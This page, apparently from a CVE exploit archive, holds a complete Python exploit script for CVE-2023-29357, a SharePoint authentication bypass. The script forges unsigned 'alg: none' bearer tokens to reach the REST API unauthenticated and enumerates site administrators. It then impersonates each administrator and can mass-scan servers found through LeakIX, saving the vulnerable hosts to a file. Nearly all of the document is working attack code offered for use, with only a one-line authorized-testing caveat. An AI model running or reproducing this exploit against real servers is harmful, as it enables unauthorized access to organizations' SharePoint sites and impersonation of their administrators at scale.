4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import json
import time
import base64
import requests
import argparse
from rich.console import Console
from urllib.parse import urlparse
from typing import Union, List, Dict
from alive_progress import alive_bar
from leakpy.scraper import LeakixScraper
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Shared rich console used for every status message printed by this script.
console = Console()
# The HTTP requests in this file are issued with verify=False; silence the
# InsecureRequestWarning that urllib3 would otherwise emit for each of them.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class SharePoint:
    """Checks a single SharePoint site for the CVE-2023-29357 authentication bypass.

    Constructing an instance performs one unauthenticated HTTP request to
    discover the site's realm and derives the token audience from it. The
    remaining methods build unsigned (``alg: none``) bearer tokens and send
    them to the site's REST API.

    Intended for use only against systems you are authorized to test.
    """

    # Fixed client identifier used as the token issuer and as the prefix of
    # the audience / default name identifier.
    client_id = "00000003-0000-0ff1-ce00-000000000000"

    def __init__(self, url: str, verbose: bool):
        """Store the target and resolve its realm and audience.

        Args:
            url: Base URL of the site; a trailing ``/`` is removed.
            verbose: When true, progress details are printed to the console.

        Raises:
            Exception: If the realm cannot be retrieved (see ``get_realm``).
        """
        self.url = url.rstrip('/')
        self.hostname = urlparse(url).hostname
        self.verbose = verbose

        if self.verbose:
            console.print("[+] URL:", self.url, style="bold green")
            console.print("[+] Hostname:", self.hostname, style="bold green")

        self.realm = self.get_realm()
        self.aud = self.construct_aud_field()

    @staticmethod
    def _parse_realm(www_authenticate: str) -> Union[str, None]:
        """Return the first ``realm="..."`` value in a WWW-Authenticate header, or None."""
        marker = 'realm="'
        for part in www_authenticate.split(','):
            if marker in part:
                return part.split(marker)[1].split('"')[0]
        return None

    @staticmethod
    def _encode_unsigned_jwt(payload: Dict[str, object]) -> str:
        """Serialize ``payload`` as a three-part token with an ``alg: none`` header.

        Both JSON segments are base64url-encoded with padding stripped; the
        third segment is the fixed placeholder ``AAA``.
        """
        segments = [
            base64.urlsafe_b64encode(json.dumps(part).encode()).rstrip(b'=').decode()
            for part in ({"alg": "none"}, payload)
        ]
        return f"{segments[0]}.{segments[1]}.AAA"

    def get_realm(self) -> str:
        """Fetch the realm advertised in the site's 401 challenge.

        Sends a request with an empty bearer token to ``/_api/web/siteusers``
        and reads the ``realm`` parameter of the ``WWW-Authenticate`` header.

        Returns:
            The realm string.

        Raises:
            Exception: If the response is not a 401, or the challenge carries
                no non-empty ``realm`` value.
        """
        headers = {"Authorization": "Bearer "}
        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=3)

        realm = None
        if response.status_code == 401:
            realm = self._parse_realm(response.headers.get('WWW-Authenticate', ''))

        # A missing header or missing realm parameter is reported the same
        # way as a non-401 response instead of leaking an unbound/None realm.
        if not realm:
            if self.verbose:
                console.print("[-] Unable to retrieve realm", style="bold red")
            raise Exception("Unable to retrieve realm")

        if self.verbose:
            console.print("[+] Realm:", realm, style="bold green")

        return realm

    def construct_aud_field(self) -> str:
        """Return the audience value ``<client_id>@<realm>``."""
        aud = f"{self.client_id}@{self.realm}"

        if self.verbose:
            console.print("[+] Aud Field:", aud, style="bold green")

        return aud

    def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None:
        """Request ``/_api/web/currentuser`` once per entry in ``admin_users``.

        Each request carries an unsigned token whose ``nameid``/``nii`` claims
        are taken from the entry's ``NameId``/``NameIdIssuer`` keys. The
        outcome of every request is printed to the console.

        Args:
            admin_users: Dicts as produced by ``authenticate_with_token``
                (keys ``Title``, ``Email``, ``NameId``, ``NameIdIssuer``).
        """
        current_time = int(time.time())
        expiration_time = current_time + 3600
        # The endpoint does not depend on the user, so build it once.
        endpoint_url = self.url.strip() + '/_api/web/currentuser'

        for user in admin_users:
            payload = {
                "aud": self.aud,
                "iss": self.client_id,
                "nbf": current_time,
                "exp": expiration_time,
                "ver": "hashedprooftoken",
                "nameid": user.get("NameId", ""),
                "nii": user.get("NameIdIssuer", ""),
                "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
                "endpointurlLength": 1,
                "isloopback": True,
                "isuser": True
            }
            jwt_token = self._encode_unsigned_jwt(payload)

            headers = {
                "Accept": "application/json",
                "Authorization": f"Bearer {jwt_token}",
                "X-PROOF_TOKEN": jwt_token,
            }

            response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5)
            if response.status_code != 200:
                console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red")
                continue

            # Parse before printing so the output order matches either outcome:
            # the success line first, then the body (pretty JSON or raw text).
            try:
                parsed_response = json.loads(response.text)
            except json.JSONDecodeError:
                parsed_response = None

            console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
            if parsed_response is None and response.text.strip() != "null":
                console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow")
            else:
                console.print(json.dumps(parsed_response, indent=4), style="bold green")

    def create_jwt_token(self) -> str:
        """Build the unsigned token used for the initial authentication check.

        The token is valid from now for 3600 seconds and names
        ``<client_id>@<realm>`` as its ``nameid``.

        Returns:
            The encoded token string.
        """
        current_time = int(time.time())
        expiration_time = current_time + 3600

        payload = {
            "aud": self.aud,
            "iss": self.client_id,
            "nbf": int(current_time),
            "exp": int(expiration_time),
            "ver": "hashedprooftoken",
            "nameid": f'{self.client_id}@{self.realm}',
            "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
            "endpointurlLength": 1,
            "isloopback": True
        }

        jwt_token = self._encode_unsigned_jwt(payload)

        if self.verbose:
            console.print("[+] JWT Token:", jwt_token, style="bold green")

        return jwt_token

    def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]:
        """Request ``/_api/web/siteusers`` with ``token`` and summarize the result.

        Args:
            token: Bearer token, also sent as the ``X-PROOF_TOKEN`` header.

        Returns:
            ``False`` if the response status is not 200. Otherwise a list of
            dicts (``Title``, ``Email``, ``NameId``, ``NameIdIssuer``) for the
            users flagged ``IsSiteAdmin``; or ``True`` when that list is empty
            or the 200 response body is not valid JSON.
        """
        headers = {
            "Accept": "application/json",
            "Authorization": f"Bearer {token}",
            "X-PROOF_TOKEN": token,
        }

        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5)

        if self.verbose:
            console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow")

        if response.status_code != 200:
            if self.verbose:
                console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red")
            return False

        try:
            parsed_response = json.loads(response.text)
        except json.JSONDecodeError:
            if self.verbose:
                console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow")
            return True

        admin_info_list = [
            {
                "Title": user.get('Title', 'N/A'),
                "Email": user.get('Email', 'N/A'),
                "NameId": user.get('UserId', {}).get('NameId', 'N/A'),
                "NameIdIssuer": user.get('UserId', {}).get('NameIdIssuer', 'N/A')
            }
            for user in parsed_response.get('value', [])
            if user.get('IsSiteAdmin', False) is True
        ]

        console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green")
        if self.verbose:
            for admin_info in admin_info_list:
                console.print(json.dumps(admin_info, indent=2), style="bold green")
                console.print("=+"*20, style="bold green")

        return admin_info_list if admin_info_list else True

def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False):
    """Run the authentication check against one URL and record a positive result.

    When the check succeeds, ``url`` is appended to ``output_file`` (if one is
    given). If a list of admin users came back and ``mass_exploit`` is false,
    that list is passed on to ``SharePoint.spoof_admin_users``.

    Any exception raised along the way is swallowed; it is only printed when
    ``verbose`` is true.
    """
    try:
        target = SharePoint(url, verbose=verbose)
        token = target.create_jwt_token()
        outcome = target.authenticate_with_token(token)

        # Falsy outcome means the check did not succeed: nothing to record.
        if not outcome:
            return

        if output_file:
            with open(output_file, 'a') as handle:
                handle.write(f"{url}\n")

        if isinstance(outcome, list) and not mass_exploit:
            target.spoof_admin_users(outcome)

    except Exception as e:
        if verbose:
            console.print("[!] Error in check_url:", str(e), style="bold red")

    
def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2):
    """Query LeakIX through LeakPy and return the distinct result URLs.

    The API key is read from the ``LEAKIX_API_KEY`` constant below; while it
    is empty the function prints a notice and exits with status 1.

    Args:
        fields: Field list forwarded to the scraper.
        bulk: Forwarded to the scraper as ``use_bulk``.
        pages: Number of result pages forwarded to the scraper.

    Returns:
        A list of ``protocol://host:port`` strings, de-duplicated in
        first-seen order.
    """
    LEAKIX_API_KEY = "" # Configure this line with your LeakIX Pro API Key to use LeakPy

    if not LEAKIX_API_KEY:
        console.print("[bold red]Please configure the Leakix API key.[/bold red]")
        exit(1)

    scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True)
    results = scraper.execute(
        scope="leak",
        query='+plugin:SharePointPlugin',
        fields=fields,
        pages=pages,
        use_bulk=bulk,
    )

    # dict.fromkeys keeps the first occurrence of each URL and its position.
    return list(dict.fromkeys(
        f"{entry.get('protocol')}://{entry.get('host')}:{entry.get('port')}"
        for entry in results
    ))

def _build_arg_parser():
    """Create the command-line parser for this script."""
    parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.')
    parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False)
    parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False)
    parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10)
    parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt')
    parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False)
    parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks")
    parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)")
    parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX")
    return parser


def main():
    """Parse the command line, collect target URLs and check them.

    URL sources are tried in this order: ``--leakpy``, ``--list``, ``--url``.
    More than one URL from LeakIX or a list file is checked concurrently with
    a progress bar; otherwise only the first URL is checked, in-process.
    """
    args = _build_arg_parser().parse_args()

    targets = []
    if args.leakpy:
        targets = fetch_from_leakix(bulk=args.bulk, pages=args.pages)
    elif args.list:
        with open(args.list, 'r') as handle:
            targets = [entry.strip() for entry in handle]
    elif args.url:
        targets = [args.url]

    if not targets:
        console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]")
        return

    from_bulk_source = args.leakpy or args.list
    if not (len(targets) > 1 and from_bulk_source):
        check_url(targets[0], args.output, args.verbose, mass_exploit=False)
        return

    with ThreadPoolExecutor(max_workers=args.threads) as executor, alive_bar(len(targets), bar='smooth', enrich_print=False) as bar:
        pending = [
            executor.submit(check_url, target, args.output, args.verbose, mass_exploit=True)
            for target in targets
        ]
        # Advance the bar once per finished check, in completion order.
        for _ in as_completed(pending):
            bar()


# Run the command-line interface only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()